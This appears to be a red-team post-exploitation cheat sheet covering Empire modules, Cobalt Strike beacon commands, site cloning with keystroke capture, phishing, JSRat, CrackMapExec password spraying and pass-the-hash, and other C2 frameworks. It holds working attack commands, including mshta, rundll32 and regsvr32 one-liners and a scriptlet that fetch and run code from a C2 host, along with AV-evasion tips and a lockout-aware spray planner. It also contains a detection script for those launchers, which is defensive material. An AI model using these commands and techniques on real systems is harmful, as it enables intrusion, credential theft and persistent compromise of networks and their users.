lateral_movement/invoke_psexec    lateral movement via PsExec
lateral_movement/invoke_psremoting    lateral movement via PowerShell remoting
lateral_movement/invoke_smbexec    lateral movement via SMBExec
lateral_movement/invoke_sqloscmd    lateral movement via xp_cmdshell
lateral_movement/invoke_sshcommand    lateral movement via SSH
lateral_movement/invoke_wmi    lateral movement via WMI
lateral_movement/invoke_wmi_debugger    use WMI to set the debugger for a binary on a remote machine to cmd.exe or a stager
lateral_movement/jenkins_script_console    lateral movement through an unauthenticated Jenkins script console
lateral_movement/new_gpo_immediate_task    lateral movement through an immediate scheduled task in a GPO

Management

Module name    Function
management/enable_rdp*    enable RDP on a remote machine and add a firewall exception
management/disable_rdp*    disable RDP on a remote machine
management/downgrade_account    set reversible encryption on a given domain account and force a password change at next logon
management/enable_multi_rdp*    allow multiple users to hold concurrent RDP sessions
management/get_domain_sid    return the SID of the current or specified domain
management/honeyhash*    inject artificial (honeytoken) credentials into LSASS
management/invoke_script    run a custom script
management/lock    lock the workstation
management/logoff    log off the current user (or all users)
management/psinject    inject Stephen Fewer's ReflectivePick into a remote process and run PowerShell code from memory there
management/reflective_inject    inject Stephen Fewer's ReflectivePick into a remote process and run PowerShell code from memory there
management/restart    restart the given machine
management/runas    run a program with given credentials; can bypass GPO path restrictions
management/shinject    inject a position-independent shellcode payload into a target process
management/sid_to_user    convert a domain SID to a user
management/spawn    spawn a new agent in a new powershell.exe process
management/spawnas    spawn an agent with the given logon credentials
management/switch_listener    switch the agent to another listener
management/timestomp    invoke Set-MacAttribute for timestomp-like functionality
management/user_to_sid    convert a domain\user to its domain SID
management/vnc    Invoke-Vnc: run a VNC agent in memory and start a reverse connection
management/wdigest_downgrade*    set the machine's WDigest provider to cache plaintext credentials
management/zipfolder    zip a target folder for later exfiltration
management/mailraider/disable_security    check (and disable) Outlook's ObjectModelGuard security prompts
management/mailraider/get_emailitems    return all items in the given Outlook folder
management/mailraider/get_subfolders    list all folders under the given top-level folder
management/mailraider/mail_search    search the given Outlook folder for items
management/mailraider/search_gal    return all Exchange users matching the given search criteria
management/mailraider/send_mail    send e-mail to the given addresses using a custom or default template
management/mailraider/view_email    select the given folder and output the e-mail item at the given index

Persistence

Module name    Function
persistence/elevated/registry*    machine-wide run-key persistence through HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run, running a stager or script
persistence/elevated/schtasks*    scheduled-task persistence
persistence/elevated/wmi*    WMI event subscription persistence
persistence/elevated/wmi_updater*    WMI subscription persistence that fetches the stager from a URL
persistence/misc/add_netuser    add a domain or local user on the current (or a remote) machine
persistence/misc/add_sid_history*    Invoke-Mimikatz misc::addsid to add a SID to a user's SID history; domain controller only
persistence/misc/debugger*    set the debugger for a given target binary to cmd.exe
persistence/misc/disable_machine_acct_change*    stop the target system's machine account from rotating its password
persistence/misc/get_ssps    enumerate all loaded security packages
persistence/misc/install_ssp*    install a Security Support Provider DLL
persistence/misc/memssp*    Invoke-Mimikatz misc::memssp to log all authentication events to C:\Windows\System32\mimilsa.log
persistence/misc/skeleton_key*    Invoke-Mimikatz misc::skeleton to implant mimikatz's skeleton key master password; domain controller only
persistence/powerbreach/deaduser    DeadUserBackdoor; details at http://www.sixdub.net/?p=535
persistence/powerbreach/eventlog*    start the event-log loop backdoor
persistence/powerbreach/resolver    start the DNS resolver backdoor
persistence/userland/backdoor_lnk    LNK file backdoor
persistence/userland/registry    per-user run-key persistence through HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run, running a stager or script
persistence/userland/schtasks    scheduled-task persistence (user level)

Privesc

Module name    Function
privesc/ask    pop up a dialog asking the user to run PowerShell as administrator
privesc/bypassuac    UAC bypass
privesc/bypassuac_env    UAC bypass
privesc/bypassuac_eventvwr    UAC bypass
privesc/bypassuac_fodhelper    UAC bypass
privesc/bypassuac_sdctlbypass    UAC bypass
privesc/bypassuac_tokenmanipulation    UAC bypass
privesc/bypassuac_wscript    UAC bypass
privesc/getsystem*    get SYSTEM privileges
privesc/gpp    recover accounts from Group Policy Preferences (cpassword) files
privesc/mcafee_sitelist    find plaintext passwords in McAfee SiteList.xml files
privesc/ms16-032    MS16-032 local privilege escalation
privesc/ms16-135    MS16-135 local privilege escalation
privesc/tater    Hot Potato privilege escalation implemented in PowerShell
privesc/powerup/allchecks    check the target host for privilege-escalation vectors
privesc/powerup/find_dllhijack    find generic .DLL hijacking opportunities
privesc/powerup/service_exe_restore    restore a backed-up service binary
privesc/powerup/service_exe_stager    back up a service binary and replace it with one that launches stager.bat
privesc/powerup/service_exe_useradd    replace a service binary with one that creates a local user and adds it to local Administrators
privesc/powerup/service_stager    modify the target service to run an Empire stager
privesc/powerup/service_useradd    modify the target service to create a local user and add it to local Administrators
privesc/powerup/write_dllhijacker    write a hijackable .dll together with the stager.bat it calls to the given path; wlbsctrl.dll works well on Windows 7; requires a reboot

Recon

Module name    Function
recon/find_fruit    search a network range for potentially vulnerable web services
recon/get_sql_server_login_default_pw    find SQL Server instances in the broadcast domain and check them for default application logins
recon/http_login    test credentials against HTTP basic authentication

Situational awareness

Module name    Function
situational_awareness/host/antivirusproduct    get antivirus product information
situational_awareness/host/computerdetails*    enumerate useful information about the system
situational_awareness/host/dnsserver    enumerate the DNS servers the system uses
situational_awareness/host/findtrusteddocuments    enumerate the registry keys for Office trusted documents and trusted locations
situational_awareness/host/get_pathacl    enumerate the ACL of a given file path
situational_awareness/host/get_proxy    enumerate the current user's proxy server and WPAD contents
situational_awareness/host/get_uaclevel    enumerate the UAC level
situational_awareness/host/monitortcpconnections    monitor TCP connections from the host to a given domain name or IPv4 address; useful for session hijacking and for finding users who talk to sensitive services
situational_awareness/host/paranoia*    continuously check for suspicious users during the operation
situational_awareness/host/winenum    collect information about the host and the current user context
situational_awareness/network/arpscan    ARP scan of a range of IPv4 addresses
situational_awareness/network/bloodhound    run the BloodHound collector
situational_awareness/network/get_exploitable_system    query Active Directory for systems likely vulnerable to Metasploit exploits
situational_awareness/network/get_spn    get service principal names (SPNs)
situational_awareness/network/get_sql_instance_domain    list SQL Server instances registered in the domain
situational_awareness/network/get_sql_server_info    basic server and user information from a target SQL Server
situational_awareness/network/portscan    simple port scan with plain sockets
situational_awareness/network/reverse_dns    reverse DNS lookups over an IPv4 range
situational_awareness/network/smbautobrute    SMB brute force against a username/password list
situational_awareness/network/smbscanner    test a username/password combination on several machines
situational_awareness/network/powerview/find_foreign_group    enumerate all members of a domain's groups and find users that are not in the queried domain
situational_awareness/network/powerview/find_foreign_user    enumerate users in groups outside their home domain
situational_awareness/network/powerview/find_gpo_computer_admin    take a computer (or GPO) object and determine which users/groups have administrative access to it
situational_awareness/network/powerview/find_gpo_location    take a user or group name and determine the computers it has administrative access to through GPO
situational_awareness/network/powerview/find_localadmin_access    find machines in the local domain where the current user has local administrator access
situational_awareness/network/powerview/find_managed_security_group    retrieve all security groups in the domain and who manages them
situational_awareness/network/powerview/get_cached_rdpconnection    use the remote registry to query a machine for Remote Desktop Connection client information
situational_awareness/network/powerview/get_computer    query the domain for computer objects
situational_awareness/network/powerview/get_dfs_share    list all fault-tolerant distributed file systems in a domain
situational_awareness/network/powerview/get_domain_controller    return the domain controllers for the current or a specified domain
situational_awareness/network/powerview/get_domain_policy    return the default domain or DC policy for a domain or domain controller
situational_awareness/network/powerview/get_domain_trust    return all domain trusts for the current or a specified domain
situational_awareness/network/powerview/get_fileserver    list all file servers extracted from users' home directories
situational_awareness/network/powerview/get_forest    information about a given forest
situational_awareness/network/powerview/get_forest_domain    all domains of a given forest
situational_awareness/network/powerview/get_gpo    list all current GPOs in the domain
situational_awareness/network/powerview/get_group    list all current groups in the domain
situational_awareness/network/powerview/get_group_member    members of a given group
situational_awareness/network/powerview/get_localgroup    all current members of a given local group on a local or remote machine
situational_awareness/network/powerview/get_loggedon    NetWkstaUserEnum Win32 API call to query users actively logged on to a host
situational_awareness/network/powerview/get_object_acl    the ACL associated with a specific Active Directory object
situational_awareness/network/powerview/get_ou    list all current OUs in the domain
situational_awareness/network/powerview/get_rdp_session    query active sessions and originating IPs on a given Remote Desktop host
situational_awareness/network/powerview/get_session    NetSessionEnum Win32 API call to query active sessions on a host
situational_awareness/network/powerview/get_site    list all current sites in the domain
situational_awareness/network/powerview/get_subnet    list all current subnets in the domain
situational_awareness/network/powerview/get_user    query information for a given user or for the users of a specified domain
situational_awareness/network/powerview/map_domain_trust    map all reachable domain trusts, with .CSV output
situational_awareness/network/powerview/process_hunter    query the process lists of remote machines
situational_awareness/network/powerview/set_ad_object    look up a domain object by SID, name or SamAccountName and set an attribute on it
situational_awareness/network/powerview/share_finder    find shares on machines in the domain
situational_awareness/network/powerview/user_hunter    find machines where users of a specified group are logged on

Trollsploit

Module name    Function
trollsploit/get_schwifty    play the Schwifty video with the volume turned to maximum
trollsploit/message    display a message box
trollsploit/process_killer    kill any process whose name starts with a given string
trollsploit/rick_ascii    spawn a new powershell.exe process running Lee Holmes' ASCII Rick Roll
trollsploit/rick_astley    run SadProcessor's beeping rickroll
trollsploit/thunderstruck    play the Thunderstruck video with the volume turned to maximum
trollsploit/voicetroll    read text aloud with the target's speech synthesiser
trollsploit/wallpaper    upload a .jpg to the target and set it as the desktop wallpaper
trollsploit/wlmdr    show a balloon tip in the taskbar

Empire and Word

>usestager windows/launcher_bat    generate a .bat stager; set Listener
Word/Excel -> Insert -> Object -> Create from File, choose the .bat, tick Display as icon and change the icon
Macro
>usestager windows/macro    set Listener
Word/Excel -> View -> Macros -> Create, paste the generated macro in

Spawning Cobalt Strike and MSF from Empire

Spawning MSF
Injecting shellcode from the running agent can get past some AV
Empire
>usemodule code_execution/invoke_shellcode
>set Lhost 192.168.0.1
>set Lport 4444
>set Payload reverse_http
MSF (the handler must use the same host and port as Lhost/Lport set above, and a payload of the same type)
>use exploit/multi/handler
>set payload windows/meterpreter/reverse_http
>set LHOST 192.168.0.1
>set LPORT 4444
>run
or, in Empire
>usemodule code_execution/invoke_metasploitpayload
>set URL http://SRVHOST:SRVPORT
MSF
#use exploit/multi/script/web_delivery
#set payload windows/x64/meterpreter/reverse_tcp
Set SRVHOST and SRVPORT and choose the PowerShell target
Spawning Cobalt Strike
Create a windows/beacon_http/reverse_http listener and set its host and port
Empire
>usemodule code_execution/invoke_shellcode
>set Lhost 192.168.0.1
>set Lport 4444
>set Payload reverse_http

Cobalt Strike

Installation

A JDK is required
>tar -xzvf jdk-8u191-linux-x64.tar.gz

Starting the team server

>./teamserver 192.168.0.107 123456
Arguments: the externally reachable IP and the team server password

Menus

New Connection: open a new connection
Preferences: appearance settings
Visualization: different views of the hosts
VPN Interfaces: VPN interfaces
Listeners: listeners
Script Interfaces: view and load CNA scripts
Close: close Cobalt Strike

Connecting

Listeners

Creating one
Cobalt Strike -> Listeners, click Add

Beacon listeners are Cobalt Strike's own.
Foreign listeners are normally used to hand sessions to MSF.
Supported architectures

Attack packages

Name    Function
HTML Application    PowerShell-based .hta HTML Application payload; three delivery methods: executable, PowerShell, VBA
MS Office Macro    Office macro document
Payload Generator    payload source in C, C#, COM Scriptlet, Java, Perl, PowerShell, Python, Ruby, VBA and other formats
USB/CD AutoPlay    payload launched through USB/CD AutoPlay
Windows Dropper    binder that bundles the payload with a document
Windows Executable    staged 32- or 64-bit EXE, service executable or DLL
Windows Executable(S)    stageless executable; also supports PowerShell output and a proxy configuration
Web Drive-by    web-based attacks
Name    Function
Manage    manage the running web modules
Clone Site    clone a website
Host File    host a file for download
Scripted Web Delivery    web-delivered payload one-liners
Signed Applet Attack    self-signed Java applet attack
Smart Applet Attack    detect the Java version and use a known exploit
System Profiler    fingerprint the visitor's browser and plugins

View menu

Applications    applications found on the target
Credentials    credentials (from hashdump and mimikatz)
Downloads    downloaded files
Event Log    event log
Keystrokes    captured keystrokes
Proxy Pivots    proxy pivots
Screenshots    screenshots
Script Console    script console
Targets    targets
Web Log    web server log
Generating a PowerShell script

Copy the script to the target and run it; the host checks in.

Interaction

Right-click the target and choose Interact
Access
Dump hashes    dump password hashes
Elevate    privilege escalation
Golden Ticket    inject a golden ticket into the session
Make token    make a token from credentials
Run Mimikatz    run mimikatz
Spawn As    spawn a session as another user on the target
Explore
Browser Pivot    browser pivoting (ride the victim's authenticated browser sessions)
Desktop(VNC)    remote desktop over VNC
File Browser    file browser
Net View    run net view
Port scan    port scan
Process list    process list
Screenshot    screenshot
Pivoting
SOCKS Server    SOCKS proxy
Listener    use the compromised host as a listener (reverse port forward)
Deploy VPN    deploy a VPN interface
Spawn
Spawn a session into MSF or Armitage
Right-click -> Run Mimikatz dumps hashes and plaintext passwords

View -> Credentials lists them, like Empire's creds command

Beacon

argue                     spoof process arguments
blockdlls                 block non-Microsoft DLLs from loading into child processes
browserpivot              inject into the victim's browser process (browser pivot)
bypassuac                 bypass UAC to elevate
cancel                    cancel a download in progress
cd                        change directory
checkin                   force the beacon to check in once
clear                     clear the beacon's task queue
connect                   connect to a Beacon peer over TCP
covertvpn                 deploy the Covert VPN client
cp                        copy a file
dcsync                    extract password hashes from a DC
desktop                   remote desktop (VNC)
dllinject                 reflectively inject a DLL into a process
dllload                   load a DLL into a process with LoadLibrary
download                  download a file
downloads                 list file downloads in progress
drives                    list drives on the target
elevate                   run an elevation exploit
execute                   run a program on the target (no output)
execute-assembly          run a local .NET program in memory on the target
exit                      terminate the beacon session
getprivs                  enable system privileges on the current token
getsystem                 try to get SYSTEM
getuid                    get the user ID
hashdump                  dump password hashes
help                      help
inject                    spawn a session inside a specific process
jobkill                   kill a background job
jobs                      list background jobs
kerberos_ccache_use       import a ticket from a ccache file into this session
kerberos_ticket_purge     purge this session's Kerberos tickets
kerberos_ticket_use       import a ticket from a .kirbi file into this session
keylogger                 keylogger
kill                      kill a process
link                      connect to a Beacon peer over a named pipe
logonpasswords            dump credentials and hashes with mimikatz
ls                        list files
make_token                create a token to pass credentials
mimikatz                  run mimikatz
mkdir                     make a directory
mode dns                  use DNS A records as the channel (DNS beacon only)
mode dns-txt              use DNS TXT records as the channel (DNS beacon only)
mode dns6                 use DNS AAAA records as the channel (DNS beacon only)
mode http                 use HTTP as the channel
mv                        move a file
net                       net command
note                      set a note on this beacon
portscan                  scan ports
powerpick                 run a command via Unmanaged PowerShell
powershell                run a command via powershell.exe
powershell-import         import a PowerShell script
ppid                      set the parent PID for spawned post-exploitation jobs
ps                        list processes
psexec                    use a service to spawn a session on a host
psexec_psh                use PowerShell to spawn a session on a host
psinject                  run a PowerShell command inside a specific process
pth                       pass-the-hash with mimikatz
pwd                       print the current directory
reg                       query the registry
rev2self                  revert to the original token
rm                        remove a file or folder
rportfwd                  reverse port forward
run                       run a program on the target (returns output)
runas                     run a program as another user
runasadmin                run a program in an elevated context
runu                      run a program under another PID
screenshot                take a screenshot
setenv                    set an environment variable
shell                     run a cmd command
shinject                  inject shellcode into a process
shspawn                   spawn a process and inject shellcode into it
sleep                     set the sleep time
socks                     start a SOCKS4a proxy
socks stop                stop the SOCKS4a proxy
spawn                     spawn a session
spawnas                   spawn a session as another user
spawnto                   set the executable to spawn processes into
spawnu                    spawn a session under another PID
ssh                       connect to a remote host over SSH
ssh-key                   connect to a remote host over SSH with a key
steal_token               steal a token from a process
timestomp                 apply one file's timestamps to another
unlink                    disconnect from the parent Beacon
upload                    upload a file
wdigest                   dump plaintext credentials with mimikatz
winrm                     lateral movement via WinRM
wmi                       lateral movement via WMI
To run a command in beacon mode type shell followed by the command

>sleep 0    interactive mode, tasks run immediately (noisy; raise the sleep again when done)
Inject a DLL into a process
>dllload [pid] [c:\path\to\file.dll]    the DLL must already be on the target
>kerberos_ticket_purge    purge tickets
>kerberos_ccache_use [/path/to/file.ccache]    import a ticket from a ccache file
>kerberos_ticket_use [/path/to/ticket.kirbi]    import a ticket from a kirbi file
>kill pid    kill a process
>timestomp [fileA] [fileB]    apply fileB's timestamps to fileA
>getuid    current user
>steal_token [pid]    steal the token of a process
>rev2self    revert to the original token
>powershell-import [/path/to/local/script.ps1]    import a PowerShell module
>shinject [pid] <x86|x64> [/path/to/my.bin]    inject shellcode into a process
>socks port    start a SOCKS proxy on the given port
>socks stop    stop the proxy
>rportfwd [bind port] [forward host] [forward port]    reverse port forward

Cloning a website

Attacks -> Web Drive-by -> System Profiler
Set Redirect URL to the target site; once the profile has been collected the visitor is redirected to the real site
Attacks -> Web Drive-by -> Clone Site
Enter the site to clone as Clone URL
Attack: choose the System Profiler URL created above
With keystroke logging enabled on the clone, the Web Log view records what is typed into it

Attacks -> Web Drive-by -> Manage lets you kill the web tasks started above

Office macro

Phishing e-mail

Clone another site

Choose the cloned site as Embed URL

Every hyperlink in the template is replaced with the Embed URL

If you attach a file, make sure the attachment evades AV first

Loading scripts

https://github.com/rsmudge/ElevateKit    privilege-escalation exploits packaged as a CNA script
>git clone https://github.com/rsmudge/ElevateKit.git
>git clone https://github.com/TheKingOfDuck/myScripts.git
Cobalt Strike -> Scripts, select elevate.cna and load it
The exploit list under Elevate now includes the loaded modules

Browser pivoting

Put the beacon in interactive mode
beacon> sleep 0
[Beacon] -> Explore -> Browser Pivot
Choose a browser process marked with a tick and inject; a proxy is returned as server IP + port
>chromium --no-sandbox --ignore-certificate-errors --proxy-server=serverIP:port
Browse to the site through the proxy and the victim's cookies and authenticated sessions are reused
(Browser pivoting only works against Internet Explorer, since it rides IE's WinINet session state)

Persistence

https://github.com/DeEpinGh0st/Erebus
Load the CNA script
Cobalt Strike -> Script Manager -> Load -> Main.cna from Erebus
Generate a payload
Attacks -> Packages -> Windows Executable(S)
Erebus -> Persistence, pick a persistence method

Lateral movement

Host discovery
>portscan [targets] [ports] [arp|icmp|none] [max connections]
>portscan 192.168.1.0/24 445 arp 100
or right-click the target -> Scan
View -> Targets shows the hosts found alive (targets can also be added by hand)
Login -> psexec to log in with pass-the-hash

Isolated networks

Pivoting through a compromised host
Pivoting -> Listener: create a listener bound on the host that already has a beacon

Attacks -> Packages -> Windows Executable(Stageless)

Upload the generated payload and PsExec.exe to the compromised host
beacon>shell C:\psexec.exe -accepteula \\10.1.1.105 -u administrator -p xxx -d -c C:\beacon.exe

SMB beacon
Create a bind listener windows/beacon_smb/bind_pipe
Run
>psexec [target] [ADMIN$|C$] [listener name]
SSH login
>ssh [target:port] [user] [password], for example
>ssh 10.1.1.98:22 root admin

Proxy

>socks 690
View -> Proxy Pivots -> Tunnel: copy the generated proxy configuration and paste it into msfconsole

Deploying a VPN

Select the internal interface

Add

Remove

Spawning Empire and MSF from Cobalt Strike

Spawning Empire
Create an Empire listener
Create a stager
>usestager windows/shellcode    execute; writes /tmp/launcher.bin
In Cobalt Strike find a process with ps and inject the shellcode (>shinject <pid> x64 /tmp/launcher.bin)
Spawning MSF
Use a Cobalt Strike foreign listener:
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
Start the matching handler in MSF
On the beacon host choose Spawn, create a foreign listener (for example windows/foreign/reverse_tcp) pointing at the IP and port MSF is listening on

JSRat

https://github.com/Hood3dRob1n/JSRat-Py
https://github.com/Ridter/MyJSRat
Start
>python JSRat.py -i 192.168.0.107 -p 1234
MyJSRat takes -c to specify the command to run

/connect is the callback URL, /wtf serves the code to execute

Run the one-liner directly on the target

or
>regsvr32.exe /u /n /s /i:http://192.168.0.107:1234/file.sct scrobj.dll
JSRat shows the host checking in

WSC method (a Windows Script Component whose JScript launches the rundll32 loader)
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
        rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://192.168.0.107:1234/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.0.107/jsrat.wsc")
Mshta method
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:1234/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
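All three launchers above (regsvr32 with a remote scriptlet, rundll32 and mshta with the javascript: protocol handler) use signed Microsoft binaries, so the useful signal for defenders is the process command line rather than the image. The following detection-side check is an added example, not part of the original post or of JSRat: it runs a handful of regexes over process command lines such as those recorded by Sysmon event 1 or Security event 4688 (with command-line auditing enabled). The sample command lines are constructed from this section plus two benign uses of the same binaries.

```python
"""Flag the scriptlet / protocol-handler launch patterns used above in process command lines.

Added example, not part of the original post. Input is a list of process
command lines (e.g. from Sysmon event 1 or Security 4688); the samples below
are constructed from this section plus benign invocations of the same binaries.
"""
import re
from typing import Dict, List

# Each rule: (label, regex over the full process command line), case-insensitive.
RULES = [
    ("regsvr32 remote scriptlet via /i:<url> (Squiblydoo)",
     re.compile(r"\bregsvr32(\.exe)?\b.*?/i:\s*https?://", re.I)),
    ("regsvr32 loading scrobj.dll",
     re.compile(r"\bregsvr32(\.exe)?\b.*\bscrobj\.dll\b", re.I)),
    ("rundll32 with javascript: protocol handler",
     re.compile(r"\brundll32(\.exe)?\b.*\bjavascript:", re.I)),
    ("mshta with javascript:/vbscript: protocol handler",
     re.compile(r"\bmshta(\.exe)?\b.*\b(javascript|vbscript):", re.I)),
    ("mshta fetching remote content",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("GetObject(\"script:...\") remote scriptlet moniker",
     re.compile(r"GetObject\(\s*['\"]script:", re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Return the labels of every rule the command line matches (empty list = not flagged)."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged command line to its labels; unflagged lines are dropped."""
    hits: Dict[str, List[str]] = {}
    for line in cmdlines:
        labels = classify(line)
        if labels:
            hits[line] = labels
    return hits


# Constructed sample: the launchers shown in this section and two benign invocations.
SAMPLE_CMDLINES = [
    r'regsvr32.exe /u /n /s /i:http://192.168.0.107:1234/file.sct scrobj.dll',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.0.107/jsrat.wsc")',
    r'mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:1234/connect",false);',
    r'regsvr32.exe /s "C:\Program Files\Vendor\vendorctl.dll"',   # benign: local DLL registration
    r'mshta.exe C:\Windows\Help\intro.hta',                        # benign: local HTA
]

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_CMDLINES).items():
        print(line[:60] + "...", "->", "; ".join(labels))
```

The rules key on the protocol handler and on the remote-scriptlet switches rather than on the binary name alone, which is what keeps the two benign lines out of the results; in production the same logic would be tightened with parent-process and network-egress context.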

CrackMapExec

Enumeration

List live hosts
>crackmapexec smb 192.168.0.0/24

Brute force

Supported protocols: ssh, smb, winrm, mssql, http (the protocol is the first argument)
Brute-force SMB on two hosts with one username and several passwords
>crackmapexec smb 192.168.0.98 192.168.0.55 -u username1 -p password1 password2
>crackmapexec smb 192.168.0.0/24 -d zone.com -u y -p 'password' --shares    -d sets the domain; --shares also lists the shares

Password spraying
>crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
Using wordlists
>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -p /tmp/pass.txt
With two files every user is tried against every password, which will lock accounts out under a normal lockout policy; --no-bruteforce pairs line N of the user file with line N of the password file instead, and --continue-on-success keeps going after a valid pair is found.
Brute force with hashes
>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -H /tmp/ntlm.txt
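The spraying commands above have no notion of the target's lockout policy. The helper below is an added example, not part of the original post or of CrackMapExec: given the lockout threshold and observation window (the values `net accounts /domain` reports), it splits the password list into batches that keep every account below the threshold and emits one crackmapexec invocation per password (user file x single password) with a full observation window of sleep between batches. The policy numbers and password list are constructed.

```python
"""Plan a password spray that stays under the domain lockout threshold.

Added example, not part of the original post. CrackMapExec tries every
user/password combination when both -u and -p are files, so a long password
list against a real lockout policy locks the whole user list out. Threshold
and observation window come from `net accounts /domain`; the values used
here are constructed.
"""
import shlex
from datetime import timedelta
from typing import List


def plan_spray(passwords: List[str], lockout_threshold: int, safety_margin: int = 1) -> List[List[str]]:
    """Split passwords into batches of at most (threshold - margin) attempts per account.

    lockout_threshold == 0 corresponds to "Lockout threshold: Never" in net accounts output.
    """
    if safety_margin < 1:
        raise ValueError("safety_margin must be at least 1")
    if lockout_threshold == 0:
        return [list(passwords)]
    per_batch = lockout_threshold - safety_margin
    if per_batch < 1:
        raise ValueError("threshold %d leaves no safe attempts" % lockout_threshold)
    return [passwords[i:i + per_batch] for i in range(0, len(passwords), per_batch)]


def cme_commands(target: str, users_file: str, batches: List[List[str]],
                 observation_window: timedelta, protocol: str = "smb") -> List[str]:
    """One crackmapexec line per password; sleep a full observation window between batches.

    Windows resets badPwdCount only once the observation window has elapsed since the
    last failed attempt, so the pause goes after a batch completes, not at a fixed clock.
    """
    cmds: List[str] = []
    for n, batch in enumerate(batches):
        if n:
            cmds.append("sleep %d" % int(observation_window.total_seconds()))
        for pw in batch:
            cmds.append("crackmapexec %s %s -u %s -p %s --continue-on-success"
                        % (protocol, target, users_file, shlex.quote(pw)))
    return cmds


def minimum_duration(batches: List[List[str]], observation_window: timedelta) -> timedelta:
    """Lower bound on wall-clock time: the mandatory pauses alone."""
    return observation_window * max(len(batches) - 1, 0)


# Constructed example policy (what `net accounts /domain` might show) and password list.
LOCKOUT_THRESHOLD = 5
OBSERVATION_WINDOW = timedelta(minutes=30)
PASSWORDS = ["Winter2020!", "Spring2020!", "Summer2020!", "Autumn2020!", "P@ssw0rd"]

if __name__ == "__main__":
    batches = plan_spray(PASSWORDS, LOCKOUT_THRESHOLD)
    for cmd in cme_commands("192.168.0.0/24", "/tmp/user.txt", batches, OBSERVATION_WINDOW):
        print(cmd)
    print("# minimum runtime:", minimum_duration(batches, OBSERVATION_WINDOW))
```

The safety margin of one keeps a single legitimate mistyped password by the real user from tipping an account over the threshold during the spray; raise it on domains where the helpdesk is likely to notice a wave of lockouts.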

Modules

Log location
~/.cme/logs
List the modules available for a protocol
>crackmapexec smb -L

Commonly used modules
Get-ComputerDetails    collect host details
Bloodhound    run the BloodHound collector
empire_exec    launch an Empire stager
enum_avproducts    enumerate AV products
enum_chrome    dump passwords saved in Chrome
get_keystrokes    keylogger
get_netdomaincontroller    list all domain controllers
get_netrdpsession    list active RDP sessions
gpp_autologin    find autologon credentials in Registry.xml on the domain controller
gpp_password    retrieve GPP passwords from Group Policy Preferences
invoke_sessiongopher    extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP sessions
invoke_vnc    inject a VNC client into memory
met_inject    inject a Metasploit payload
mimikatz    run mimikatz
mimikatz_enum_chrome    decrypt Chrome's saved passwords with mimikatz
mimikatz_enum_vault_creds    decrypt passwords stored in Windows Credential Manager
mimikittenz    run mimikittenz (pulls passwords from process memory)
multirdp    allow multiple concurrent RDP logons
netripper    intercept plaintext traffic via API hooking
pe_inject    inject a DLL/EXE
rdp    enable or disable RDP
shellcode_inject    inject shellcode
tokens    enumerate available tokens
uac    check whether UAC is enabled
wdigest    enable or disable WDigest plaintext credential caching
web_delivery    run the exploit/multi/script/web_delivery stager
Show a module's options
>crackmapexec smb -M module --options

Usage
>crackmapexec smb <target(s)> -u user -p 'P@ssw0rd' -M module -o OPTION=value

PTH

>crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
>crackmapexec smb <target(s)> -u username -H NTHASH

Running commands

>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -x 'command'

-X runs a PowerShell command
>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -X '<powershell command>'

koadic

https://github.com/zerosum0x0/koadic
>git clone https://github.com/zerosum0x0/koadic.git
>cd koadic
>pip3 install -r requirements.txt
>./koadic

SILENTTRINITY

https://github.com/byt3bl33d3r/SILENTTRINITY
A cross between Cobalt Strike and Empire
>git clone https://github.com/byt3bl33d3r/SILENTTRINITY
>pip3 install --user pipenv && pipenv install && pipenv shell
>python st.py
Start the team server
>python3 st.py teamserver <teamserver_ip> <teamserver_password>
>python3 st.py teamserver 192.168.0.108 123456
--port chooses a different port

Start the client
>python3 st.py client wss://<username>:<teamserver_password>@<teamserver_ip>:5000
>python3 st.py client wss://y:123456@192.168.0.108:5000

>listeners    enter the listeners menu
>use http    select a listener type
>options    show the parameters to configure

>set Port 8081    set a parameter
>start    start the listener
>list    show running listeners

>stop http    stop a listener by name
>stagers    enter the stagers menu
>list    list the available stagers

>use payloadname    select a stager by name
>generate http    generate the stager for the named listener

Browser C2

Not flagged by the full 360 suite or by Huorong at the time of writing
Drawbacks: a console window appears, Chrome is opened visibly, and functionality is limited
https://github.com/0x09AL/Browser-C2
>go get -u github.com/gorilla/mux
>go get -u github.com/chzyer/readline
>git clone https://github.com/0x09AL/Browser-C2.git
Edit the C2 address in /Browser-C2/agent/agent.go

Edit the path to chrome.exe

Build the client
>CGO_ENABLED=1 GOARCH= GOOS=windows go build

